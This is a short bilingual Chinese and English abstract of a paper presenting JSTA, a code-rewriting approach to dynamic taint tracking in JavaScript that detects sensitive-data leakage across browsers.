论文部分内容阅读
随着Web技术的飞速发展,JavaScript的使用越来越常见,尤其是在追求快速及时响应的Web应用中,这也导致了众多安全问题的产生。该文提出了一种基于代码改写的JavaScript动态污点跟踪方法JSTA,通过JavaScript代码的改写,让改写后的代码在执行过程中对敏感数据进行污点标记和跟踪,可及时发现敏感数据泄露行为并给出告警。与以往的研究不同的是,JSTA是独立于JavaScript引擎实现的,可以适用于多种浏览器。测试结果表明,JSTA可有效地跟踪敏感数据并检测敏感数据泄露行为。
With the rapid development of Web technology, the use of JavaScript is becoming more and more common, especially in the web applications that pursue fast and timely response, which also leads to many security problems. In this paper, we propose a JavaScript dynamic blob tracking method based on code rewriting, JSTA. By rewriting the JavaScript code, the rewritten code marks and tracks the sensitive data in the process of execution, which can detect the sensitive data leakage and give An alarm. Unlike previous research, JSTA is implemented independently of the JavaScript engine and works with many browsers. Test results show that JSTA can effectively track sensitive data and detect sensitive data leakage.